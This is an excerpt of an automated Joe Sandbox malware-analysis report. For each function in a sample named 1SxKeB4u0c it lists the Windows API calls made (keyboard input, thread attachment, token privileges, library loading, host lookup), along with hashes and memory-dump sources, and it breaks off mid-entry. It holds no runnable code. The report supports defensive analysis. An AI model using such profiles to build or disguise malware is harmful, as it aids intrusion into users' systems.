                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: KeyboardState$InputMessagePostSend
                                                                              • String ID:
                                                                              • API String ID: 432972143-0
                                                                              • Opcode ID: db42d93e8e195687caca85855f7745e2d87a2e1a1f23b639b912e2236a781201
                                                                              • Instruction ID: af81f782b9f2afb763cf5164547ef1363043bc47ca8f91e08b3a13bd089ac861
                                                                              • Opcode Fuzzy Hash: db42d93e8e195687caca85855f7745e2d87a2e1a1f23b639b912e2236a781201
                                                                              • Instruction Fuzzy Hash: 963135309402086EFF388B658804BBFBB66EB45310F04472FE481622D1E33D9949D75B
                                                                              Function 004361C5 Relevance: 6.1, APIs: 4, Instructions: 97COMMONLIBRARYCODE
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 004361FB
                                                                              • __isleadbyte_l.LIBCMT ref: 00436229
                                                                              • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 00436257
                                                                              • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 0043628D
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                              • String ID:
                                                                              • API String ID: 3058430110-0
                                                                              • Opcode ID: a60c1041aab017ddab1c5084f57e160f63eb243bd769fe5892fd9e0978686beb
                                                                              • Instruction ID: a268d3a3e6e94a3a382490fbdf87b59e774afa85b5b6ffc4d13239602402ad5c
                                                                              • Opcode Fuzzy Hash: a60c1041aab017ddab1c5084f57e160f63eb243bd769fe5892fd9e0978686beb
                                                                              • Instruction Fuzzy Hash: 8831E230600246BFDF219F65CC48B6B7BB9BF4A310F17906AE82487291DB34D850D754
                                                                              Function 00484EEE Relevance: 6.1, APIs: 4, Instructions: 95COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetForegroundWindow.USER32 ref: 00484F02
                                                                                • Part of subcall function 00463641: GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0046365B
                                                                                • Part of subcall function 00463641: GetCurrentThreadId.KERNEL32 ref: 00463662
                                                                                • Part of subcall function 00463641: AttachThreadInput.USER32(00000000,?,00465005), ref: 00463669
                                                                              • GetCaretPos.USER32(?), ref: 00484F13
                                                                              • ClientToScreen.USER32(00000000,?), ref: 00484F4E
                                                                              • GetForegroundWindow.USER32 ref: 00484F54
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                                              • String ID:
                                                                              • API String ID: 2759813231-0
                                                                              • Opcode ID: 66b1f3ac083da855331d928d4446481d114f1a3fb54dcb21d0b34bab5917c058
                                                                              • Instruction ID: 1d2def75fb9c8d520c96e6582531674793c8a8545b0fc50cd96dbe06c6996e1e
                                                                              • Opcode Fuzzy Hash: 66b1f3ac083da855331d928d4446481d114f1a3fb54dcb21d0b34bab5917c058
                                                                              • Instruction Fuzzy Hash: 38314FB2D00108AFCB00EFA6C8819EFB7F9EF84304F00446EE515E7242EA759E058BA5
                                                                              Function 0048C498 Relevance: 6.1, APIs: 4, Instructions: 83windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 00402612: GetWindowLongW.USER32(?,000000EB), ref: 00402623
                                                                              • GetCursorPos.USER32(?), ref: 0048C4D2
                                                                              • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,0043B9AB,?,?,?,?,?), ref: 0048C4E7
                                                                              • GetCursorPos.USER32(?), ref: 0048C534
                                                                              • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,0043B9AB,?,?,?), ref: 0048C56E
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: Cursor$LongMenuPopupProcTrackWindow
                                                                              • String ID:
                                                                              • API String ID: 2864067406-0
                                                                              • Opcode ID: eaef0c60606744c236617b72f069d6ac48e9dc0c7f64b6eecf554375fb646ea5
                                                                              • Instruction ID: 2973952025af683afbaf652597196eb0b77ee17814688135882e4792ee887bd6
                                                                              • Opcode Fuzzy Hash: eaef0c60606744c236617b72f069d6ac48e9dc0c7f64b6eecf554375fb646ea5
                                                                              • Instruction Fuzzy Hash: CE319335500028FFCF159F58C898EAF7BB5EB09310F44486AF9059B361C735AD50DBA8
                                                                              Function 00458656 Relevance: 6.1, APIs: 4, Instructions: 79memoryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 0045810A: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00458121
                                                                                • Part of subcall function 0045810A: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 0045812B
                                                                                • Part of subcall function 0045810A: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 0045813A
                                                                                • Part of subcall function 0045810A: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00458141
                                                                                • Part of subcall function 0045810A: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00458157
                                                                              • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 004586A3
                                                                              • _memcmp.LIBCMT ref: 004586C6
                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 004586FC
                                                                              • HeapFree.KERNEL32(00000000), ref: 00458703
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
                                                                              • String ID:
                                                                              • API String ID: 1592001646-0
                                                                              • Opcode ID: 2c5cbc444dc25df1d3482cf24a588846e82523edbc0970691195306e100f3dfe
                                                                              • Instruction ID: 730e04a0c9a28b219d77ec22e6a84493cb1498a8cd35620125a6bebab32f77ad
                                                                              • Opcode Fuzzy Hash: 2c5cbc444dc25df1d3482cf24a588846e82523edbc0970691195306e100f3dfe
                                                                              • Instruction Fuzzy Hash: E4215A71E01109EBDB10DFA4C989BAEB7B8EF45306F15405EE844AB242DB34AE09CB58
                                                                              Function 0042098C Relevance: 6.1, APIs: 4, Instructions: 79COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • __setmode.LIBCMT ref: 004209AE
                                                                                • Part of subcall function 00405A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00467896,?,?,00000000), ref: 00405A2C
                                                                                • Part of subcall function 00405A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00467896,?,?,00000000,?,?), ref: 00405A50
                                                                              • _fprintf.LIBCMT ref: 004209E5
                                                                              • OutputDebugStringW.KERNEL32(?), ref: 00455DBB
                                                                                • Part of subcall function 00424AAA: _flsall.LIBCMT ref: 00424AC3
                                                                              • __setmode.LIBCMT ref: 00420A1A
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: ByteCharMultiWide__setmode$DebugOutputString_flsall_fprintf
                                                                              • String ID:
                                                                              • API String ID: 521402451-0
                                                                              • Opcode ID: f8cbf8bec01b3a097d2808ee2000faaa12c69a290c37b152d83dab8e3784db7b
                                                                              • Instruction ID: 506474fa098cb1490a8c63a0929ef03edd2b6c88ff5c0dc42923ee6bdce5b67a
                                                                              • Opcode Fuzzy Hash: f8cbf8bec01b3a097d2808ee2000faaa12c69a290c37b152d83dab8e3784db7b
                                                                              • Instruction Fuzzy Hash: E31126727041146FDB04B2A5BC469BE77A8DF81318FA0416FF105632C3EE3C5946879D
                                                                              Function 004350E2 Relevance: 6.1, APIs: 4, Instructions: 67COMMONLIBRARYCODE
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • _free.LIBCMT ref: 00435101
                                                                                • Part of subcall function 0042571C: __FF_MSGBANNER.LIBCMT ref: 00425733
                                                                                • Part of subcall function 0042571C: __NMSG_WRITE.LIBCMT ref: 0042573A
                                                                                • Part of subcall function 0042571C: RtlAllocateHeap.NTDLL(00A40000,00000000,00000001,?,00000000,00000001,?,00420DD3,?,00000000,%I,?,00409E8C,?,?,?), ref: 0042575F
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: AllocateHeap_free
                                                                              • String ID:
                                                                              • API String ID: 614378929-0
                                                                              • Opcode ID: a8023bd45059f91bbc3ba768b53d43d26a35538f988b85c4c1a404ec765a44f4
                                                                              • Instruction ID: 565aca9384bc55ec46628ce6f4316e74187f5c3bb682111b66b5609c454c8c26
                                                                              • Opcode Fuzzy Hash: a8023bd45059f91bbc3ba768b53d43d26a35538f988b85c4c1a404ec765a44f4
                                                                              • Instruction Fuzzy Hash: D411E072E01A21AECF313FB1BC05B5E3B989B183A5F50593FF9049A250DE3C89418B9C
                                                                              Function 004044A0 Relevance: 6.1, APIs: 4, Instructions: 66timewindowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • _memset.LIBCMT ref: 004044CF
                                                                                • Part of subcall function 0040407C: _memset.LIBCMT ref: 004040FC
                                                                                • Part of subcall function 0040407C: _wcscpy.LIBCMT ref: 00404150
                                                                                • Part of subcall function 0040407C: Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00404160
                                                                              • KillTimer.USER32(?,00000001,?,?), ref: 00404524
                                                                              • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00404533
                                                                              • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 0043D4B9
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
                                                                              • String ID:
                                                                              • API String ID: 1378193009-0
                                                                              • Opcode ID: 8233c1c53fe49e8a502b553c2e8f55af8437e20015ea4a24a99bc4102d4ad802
                                                                              • Instruction ID: dcb2c65cf3c1a774e1d203f737fabc32089307ed9affa8f53aec521d9447171b
                                                                              • Opcode Fuzzy Hash: 8233c1c53fe49e8a502b553c2e8f55af8437e20015ea4a24a99bc4102d4ad802
                                                                              • Instruction Fuzzy Hash: 6F21FBB0904754AFE7328B249C45BEBBBEC9B55318F0404AFE79A56281C3782984CB49
                                                                              Function 00476369 Relevance: 6.1, APIs: 4, Instructions: 61networkCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 00405A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00467896,?,?,00000000), ref: 00405A2C
                                                                                • Part of subcall function 00405A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00467896,?,?,00000000,?,?), ref: 00405A50
                                                                              • gethostbyname.WSOCK32(?,?,?), ref: 00476399
                                                                              • WSAGetLastError.WSOCK32(00000000), ref: 004763A4
                                                                              • _memmove.LIBCMT ref: 004763D1
                                                                              • inet_ntoa.WSOCK32(?), ref: 004763DC
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: ByteCharMultiWide$ErrorLast_memmovegethostbynameinet_ntoa
                                                                              • String ID:
                                                                              • API String ID: 1504782959-0
                                                                              • Opcode ID: 762733e25637bc439446b3da9c5912462bd92284ca480afd830ba0cdb0608b85
                                                                              • Instruction ID: c304d0e6e06ed5b692ae79d4b0fe9c52f6c8e6d6f1456e813eafe14ad56adccd
                                                                              • Opcode Fuzzy Hash: 762733e25637bc439446b3da9c5912462bd92284ca480afd830ba0cdb0608b85
                                                                              • Instruction Fuzzy Hash: F2114F71600109AFCB00FBA5D946CEE77B9EF04314B54847AF505B72A2DB389E14CB69
                                                                              Function 00458B41 Relevance: 6.1, APIs: 4, Instructions: 59windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • SendMessageW.USER32(?,000000B0,?,?), ref: 00458B61
                                                                              • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00458B73
                                                                              • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00458B89
                                                                              • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00458BA4
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend
                                                                              • String ID:
                                                                              • API String ID: 3850602802-0
                                                                              • Opcode ID: ca17c677d33199d8ade5de32726d6ec6320cad89c97852bedaa9fe676a546a7f
                                                                              • Instruction ID: 6d6e4feeaee75d02a1ec4dd614e497ad2765f264ac6e3ed00c825e9843e5ba14
                                                                              • Opcode Fuzzy Hash: ca17c677d33199d8ade5de32726d6ec6320cad89c97852bedaa9fe676a546a7f
                                                                              • Instruction Fuzzy Hash: 56113A79900218BFDB10DB95C884EAEBB78EB48710F2041A6E900B7250DA716E15DB94
                                                                              Function 00401290 Relevance: 6.1, APIs: 4, Instructions: 59COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 00402612: GetWindowLongW.USER32(?,000000EB), ref: 00402623
                                                                              • DefDlgProcW.USER32(?,00000020,?), ref: 004012D8
                                                                              • GetClientRect.USER32(?,?), ref: 0043B5FB
                                                                              • GetCursorPos.USER32(?), ref: 0043B605
                                                                              • ScreenToClient.USER32(?,?), ref: 0043B610
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: Client$CursorLongProcRectScreenWindow
                                                                              • String ID:
                                                                              • API String ID: 4127811313-0
                                                                              • Opcode ID: 1c8f769d0dee53fb8c778101d630ad27ed939e462680dcfd79beede70ddeeb32
                                                                              • Instruction ID: ee9d34d9398b5f91fab5137b757b2ab9dbcc007e8162b1c14587a54292e2d527
                                                                              • Opcode Fuzzy Hash: 1c8f769d0dee53fb8c778101d630ad27ed939e462680dcfd79beede70ddeeb32
                                                                              • Instruction Fuzzy Hash: 39112B39510059FBCB00EF99D8899AE77B8FB05300F4008AAF901F7291D734BA569BA9
                                                                              Function 02F5218B Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,02F515D8,00000000,00000000,?,02F52132,02F515D8,00000000,00000000,00000000,?,02F52283,00000006,FlsSetValue), ref: 02F521BD
                                                                              • GetLastError.KERNEL32(?,02F52132,02F515D8,00000000,00000000,00000000,?,02F52283,00000006,FlsSetValue,02F66FC4,FlsSetValue,00000000,00000364,?,02F5192D), ref: 02F521C9
                                                                              • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,02F52132,02F515D8,00000000,00000000,00000000,?,02F52283,00000006,FlsSetValue,02F66FC4,FlsSetValue,00000000), ref: 02F521D7
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1454997766.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_2f10000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: LibraryLoad$ErrorLast
                                                                              • String ID:
                                                                              • API String ID: 3177248105-0
                                                                              • Opcode ID: e4c521c71e5d644cf17c00b6f25ebcc5d24b1cc6331ab7fc8d35495d3487354c
                                                                              • Instruction ID: ef06cbb15d44f4cb14029c36e96692aa772080cbafccdc7b812ef83f0d94b4a1
                                                                              • Opcode Fuzzy Hash: e4c521c71e5d644cf17c00b6f25ebcc5d24b1cc6331ab7fc8d35495d3487354c
                                                                              • Instruction Fuzzy Hash: CE01A776F41236ABE7214A79EC44E57BB98AF45BE17110B20FF15D7140D720D921CAF0
                                                                              Function 00436FB7 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                              • String ID:
                                                                              • API String ID: 3016257755-0
                                                                              • Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                                                              • Instruction ID: 3d94be51af7e819a6a5def82be0e086b27bd99855e7e965629bee2c507946819
                                                                              • Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                                                              • Instruction Fuzzy Hash: 78014EB244414ABBCF2A5E84CC41CEE3F72BB1C354F599416FA9858131D23AD9B1AB85
                                                                              Function 0048B2C5 Relevance: 6.0, APIs: 4, Instructions: 47COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetWindowRect.USER32(?,?), ref: 0048B2E4
                                                                              • ScreenToClient.USER32(?,?), ref: 0048B2FC
                                                                              • ScreenToClient.USER32(?,?), ref: 0048B320
                                                                              • InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 0048B33B
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: ClientRectScreen$InvalidateWindow
                                                                              • String ID:
                                                                              • API String ID: 357397906-0
                                                                              • Opcode ID: e8173e98fc73e507b6a04d2f7e54522757b65c9b70d93ac78b94b59699abf8f9
